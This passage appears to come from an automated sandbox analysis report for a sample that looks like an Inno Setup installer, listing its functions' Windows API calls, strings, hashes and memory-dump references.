                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,02072BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 00478306
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                                      • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                                      • API String ID: 2704155762-2318956294
                                                                                                      • Opcode ID: 626e47d356fab76083b756a204e0250164ee9b03011d355f3d3167744cb8654e
                                                                                                      • Instruction ID: d6ca79aa4c48c3adffb9da4b01ee7f27494699adf3768a2d59cb90ace03db172
                                                                                                      • Opcode Fuzzy Hash: 626e47d356fab76083b756a204e0250164ee9b03011d355f3d3167744cb8654e
                                                                                                      • Instruction Fuzzy Hash: 5701C4707C0B0466E520316E4D8AFEB554C8B54B69F54813F7E0CEA2C2DDAE8D06016E
                                                                                                      Function 0045A170 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000000,0045A2F2,?,00000000,00000000,00000000,?,00000006,?,00000000,0049722D,?,00000000,004972D0), ref: 0045A236
                                                                                                        • Part of subcall function 004543E0: FindClose.KERNEL32(000000FF,004544D6), ref: 004544C5
                                                                                                      Strings
                                                                                                      • Failed to delete directory (%d). Will retry later., xrefs: 0045A24F
                                                                                                      • Stripped read-only attribute., xrefs: 0045A1F8
                                                                                                      • Failed to strip read-only attribute., xrefs: 0045A204
                                                                                                      • Deleting directory: %s, xrefs: 0045A1BF
                                                                                                      • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 0045A210
                                                                                                      • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 0045A2AB
                                                                                                      • Failed to delete directory (%d)., xrefs: 0045A2CC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseErrorFindLast
                                                                                                      • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                                      • API String ID: 754982922-1448842058
                                                                                                      • Opcode ID: 3a6653ca049153ac913e3aecd6f83d976b01ed6d176f23095ac7eac981277501
                                                                                                      • Instruction ID: e72d66395cbcced70a1ff0d39e5b36b51bb4b2a363b16cebf3a96f2a9050ba33
                                                                                                      • Opcode Fuzzy Hash: 3a6653ca049153ac913e3aecd6f83d976b01ed6d176f23095ac7eac981277501
                                                                                                      • Instruction Fuzzy Hash: 9A41A730A042449ACB00DBA988463AE76A55F4930AF5486BBBC04D7393CB7D8E1D875F
                                                                                                      Function 00422E60 Relevance: 12.1, APIs: 8, Instructions: 119windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCapture.USER32 ref: 00422EB4
                                                                                                      • GetCapture.USER32 ref: 00422EC3
                                                                                                      • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
                                                                                                      • ReleaseCapture.USER32 ref: 00422ECE
                                                                                                      • GetActiveWindow.USER32 ref: 00422EDD
                                                                                                      • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
                                                                                                      • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
                                                                                                      • GetActiveWindow.USER32 ref: 00422FCF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                      • String ID:
                                                                                                      • API String ID: 862346643-0
                                                                                                      • Opcode ID: f8c2677d6609ac077b52c6186ee7afb2eac2e0eedff02b6813b422cc668acf14
                                                                                                      • Instruction ID: 0c1e69f79f034fd7694da938dfb4ae80f60ee9794ae3f0b0e2c785ff7ec3c7d8
                                                                                                      • Opcode Fuzzy Hash: f8c2677d6609ac077b52c6186ee7afb2eac2e0eedff02b6813b422cc668acf14
                                                                                                      • Instruction Fuzzy Hash: E4413F70B00254AFDB10EB6ADA42B9A77F1EF44304F5540BAF500AB392DB78AE40DB5D
                                                                                                      Function 0042F2A0 Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 0042F2CA
                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0042F2E1
                                                                                                      • GetActiveWindow.USER32 ref: 0042F2EA
                                                                                                      • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F317
                                                                                                      • SetActiveWindow.USER32(?,0042F447,00000000,?), ref: 0042F338
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ActiveLong$Message
                                                                                                      • String ID:
                                                                                                      • API String ID: 2785966331-0
                                                                                                      • Opcode ID: 511403c039d27e5fd3d4a37a0efbe646b1f0bba5a7b321b537e6f3b04ffedf77
                                                                                                      • Instruction ID: 0493a3c03df3966e51b4b777c60d25e7c68e0b9e8cdf2dbcd65ae894a3a71964
                                                                                                      • Opcode Fuzzy Hash: 511403c039d27e5fd3d4a37a0efbe646b1f0bba5a7b321b537e6f3b04ffedf77
                                                                                                      • Instruction Fuzzy Hash: 7631B471A00654AFDB01EFB5DC52E6EBBB8EB09714B91447AF804E3691D738AD10CB58
                                                                                                      Function 00429490 Relevance: 12.1, APIs: 8, Instructions: 62COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • 73A0A570.USER32(00000000), ref: 0042949A
                                                                                                      • GetTextMetricsA.GDI32(00000000), ref: 004294A3
                                                                                                        • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004294B2
                                                                                                      • GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004294C6
                                                                                                      • 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294CE
                                                                                                      • GetSystemMetrics.USER32(00000006), ref: 004294F3
                                                                                                      • GetSystemMetrics.USER32(00000006), ref: 0042950D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                                                      • String ID:
                                                                                                      • API String ID: 361401722-0
                                                                                                      • Opcode ID: ed5406780fbe6b6ddf9677d4a66f370c2a77f814a30f66ac1398573dbf155f17
                                                                                                      • Instruction ID: f9189b99ec718bdc55f682ba078bc6b9c4dab98ca430e676b6dc028aca6f8884
                                                                                                      • Opcode Fuzzy Hash: ed5406780fbe6b6ddf9677d4a66f370c2a77f814a30f66ac1398573dbf155f17
                                                                                                      • Instruction Fuzzy Hash: 3301E1917087513BFB11B67A9CC2F6B61C8CB8435CF44043FFA459A3D2D96C9C80866A
                                                                                                      Function 0041DE34 Relevance: 12.1, APIs: 8, Instructions: 60windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • 73A0A570.USER32(00000000,?,00419069,004985AE), ref: 0041DE37
                                                                                                      • 73A14620.GDI32(00000000,0000005A,00000000,?,00419069,004985AE), ref: 0041DE41
                                                                                                      • 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419069,004985AE), ref: 0041DE4E
                                                                                                      • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
                                                                                                      • GetStockObject.GDI32(00000007), ref: 0041DE6B
                                                                                                      • GetStockObject.GDI32(00000005), ref: 0041DE77
                                                                                                      • GetStockObject.GDI32(0000000D), ref: 0041DE83
                                                                                                      • LoadIconA.USER32(00000000,00007F00), ref: 0041DE94
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ObjectStock$A14620A480A570IconLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 2920975243-0
                                                                                                      • Opcode ID: c7b946ff5d18463f692f08f3109d9fac972284bfbf41894a6d0fe66ccf938658
                                                                                                      • Instruction ID: 4e0a0a69a1fbcc37fa68332f5170e2556ef2fd96a8c36c1a21edcb526b0e3b4b
                                                                                                      • Opcode Fuzzy Hash: c7b946ff5d18463f692f08f3109d9fac972284bfbf41894a6d0fe66ccf938658
                                                                                                      • Instruction Fuzzy Hash: E11100B06457015AE740FF666A92BA63694D724708F00813FF605AF3D2D7792C449B9E
                                                                                                      Function 004635AC Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 004636B0
                                                                                                      • SetCursor.USER32(00000000,00000000,00007F02,00000000,00463745), ref: 004636B6
                                                                                                      • SetCursor.USER32(?,0046372D,00007F02,00000000,00463745), ref: 00463720
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cursor$Load
                                                                                                      • String ID: $ $Internal error: Item already expanding
                                                                                                      • API String ID: 1675784387-1948079669
                                                                                                      • Opcode ID: 11d96d50149c7a0783bfaa5a1745a1d7ac95eac117891e2e72ad5ff3e9801c67
                                                                                                      • Instruction ID: 5f7148262a90782ca5f39c73a98182432cf514ee5891adbc4e31059349ad3c9c
                                                                                                      • Opcode Fuzzy Hash: 11d96d50149c7a0783bfaa5a1745a1d7ac95eac117891e2e72ad5ff3e9801c67
                                                                                                      • Instruction Fuzzy Hash: EEB19270600284DFD710DF29C585B9ABBF1AF04319F14C4AAE8459B792E778EE48CF5A
                                                                                                      Function 00453D1C Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 225COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E03
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileStringWrite
                                                                                                      • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                                      • API String ID: 390214022-3304407042
                                                                                                      • Opcode ID: 4808755b3c6221495a972d98e090ec94bd7c13575b017f43438820c08e4f7dc1
                                                                                                      • Instruction ID: f7f3e57e327ad0b7fc32dd9a0c0ef844c3cf52932767352b59a94e8a2e0b7a1e
                                                                                                      • Opcode Fuzzy Hash: 4808755b3c6221495a972d98e090ec94bd7c13575b017f43438820c08e4f7dc1
                                                                                                      • Instruction Fuzzy Hash: 0E910534E001099BDB01EFA5D842BDEB7F5EF4874AF50806AE90077292D7786E49CB59
                                                                                                      Function 00476B6C Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 200windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476BC5
                                                                                                      • 73A159E0.USER32(00000000,000000FC,00476B20,00000000,00476E04,?,00000000,00476E2E), ref: 00476BEC
                                                                                                      • GetACP.KERNEL32(00000000,00476E04,?,00000000,00476E2E), ref: 00476C29
                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476C6F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: A159ClassInfoMessageSend
                                                                                                      • String ID: COMBOBOX$Inno Setup: Language
                                                                                                      • API String ID: 3375322265-4234151509
                                                                                                      • Opcode ID: 93cc19c1f2ae3cdeb94a735bb7db030fa770b3f4550c722f8e96ab60bc3149ff
                                                                                                      • Instruction ID: 76a62d5c2b18ddabed1a1f2db415f61daf58d6c828ad3828204ddc2489713d7e
                                                                                                      • Opcode Fuzzy Hash: 93cc19c1f2ae3cdeb94a735bb7db030fa770b3f4550c722f8e96ab60bc3149ff
                                                                                                      • Instruction Fuzzy Hash: 4E813C346006059FC720DF69C985AEAB7F2FB09304F1580BAE849E7762D738ED41CB59
                                                                                                      Function 00408728 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,00408970,?,?,?,?,00000000,00000000,00000000,?,00409977,00000000,0040998A), ref: 00408742
                                                                                                        • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                                        • Part of subcall function 004085BC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale$DefaultSystem
                                                                                                      • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                      • API String ID: 1044490935-665933166
                                                                                                      • Opcode ID: c01586f9bbb032a7f0f1a98200a37c80c0f70fbac98b28b944ff8a28395f8419
                                                                                                      • Instruction ID: bf07bec6589cb82417a29d9109d5e68838e6a5c97ac1b9e4b464d3d1e075229e
                                                                                                      • Opcode Fuzzy Hash: c01586f9bbb032a7f0f1a98200a37c80c0f70fbac98b28b944ff8a28395f8419
                                                                                                      • Instruction Fuzzy Hash: 55513E24B00108ABD701FBA69E41A9E77A9DB94304F50C07FA541BB3C7DA3DDE05975D
                                                                                                      Function 00411704 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
                                                                                                      • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A
                                                                                                        • Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6
                                                                                                      • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6
                                                                                                        • Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0
                                                                                                      • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                                      • String ID: ,$?
                                                                                                      • API String ID: 2359071979-2308483597
                                                                                                      • Opcode ID: 0b2693d76eb6c03a37913dcbbd37782b63df6b44dbfb9d662716933429e9dd30
                                                                                                      • Instruction ID: df95c3f439c97799bb0998fa3429798e8a176efd4e8e18b788060c5868d8049e
                                                                                                      • Opcode Fuzzy Hash: 0b2693d76eb6c03a37913dcbbd37782b63df6b44dbfb9d662716933429e9dd30
                                                                                                      • Instruction Fuzzy Hash: BA51F674A00144ABDB10EF6ADC816DA7BF9AF09304B11857BF914E73A6E738DD41CB58
                                                                                                      Function 0041BE73 Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
                                                                                                      • GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
                                                                                                      • GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
                                                                                                      • GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
                                                                                                      • DeleteObject.GDI32(?), ref: 0041BFAF
                                                                                                      • DeleteObject.GDI32(?), ref: 0041BFB8
                                                                                                      • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                                      • String ID:
                                                                                                      • API String ID: 1030595962-0
                                                                                                      • Opcode ID: 5d40efa9a489d930f0c3474e6c583d61de37ea4c8bf925e82c26674748b1ae5a
                                                                                                      • Instruction ID: 0934d86ca8fb123134a847d885dc0ae0ba41a9d0998c4bba382ea8cf266d8dc0
                                                                                                      • Opcode Fuzzy Hash: 5d40efa9a489d930f0c3474e6c583d61de37ea4c8bf925e82c26674748b1ae5a
                                                                                                      • Instruction Fuzzy Hash: 5A510571E00219AFCB14DFA9C8819EEBBF9EF48314B11442AF914E7391D738AD81CB64
                                                                                                      Function 0041CEE8 Relevance: 10.7, APIs: 7, Instructions: 152windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
                                                                                                      • 73A14620.GDI32(00000000,00000026), ref: 0041CF2D
                                                                                                      • 73A08830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF93
                                                                                                      • 73A022A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CFA2
                                                                                                      • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
                                                                                                      • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
                                                                                                      • 73A08830.GDI32(?,?,00000001,0041D07C,00000000,00000026), ref: 0041D06F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Stretch$A08830$A022A14620BitsMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2733548868-0
                                                                                                      • Opcode ID: ba9b00c7f19e374317db92bbaed8cea8fa7d56fa7ee5636777b85d926aa1c199
                                                                                                      • Instruction ID: 415929d19c0355200a34ec50ec85ee50bdb26205500aadc12dd1df5ccaef5bc8
                                                                                                      • Opcode Fuzzy Hash: ba9b00c7f19e374317db92bbaed8cea8fa7d56fa7ee5636777b85d926aa1c199
                                                                                                      • Instruction Fuzzy Hash: 7A514EB0604200AFD714DFA9C995F9BBBF9EF08304F10859AB549DB292C779ED81CB58
                                                                                                      Function 00457114 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(00000000,?,?), ref: 00457166
                                                                                                        • Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC
                                                                                                        • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                                        • Part of subcall function 0041EEB4: 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042EEC0,?,00000001), ref: 0041EF09
                                                                                                        • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004571CD
                                                                                                      • TranslateMessage.USER32(?), ref: 004571EB
                                                                                                      • DispatchMessageA.USER32(?), ref: 004571F4
                                                                                                      Strings
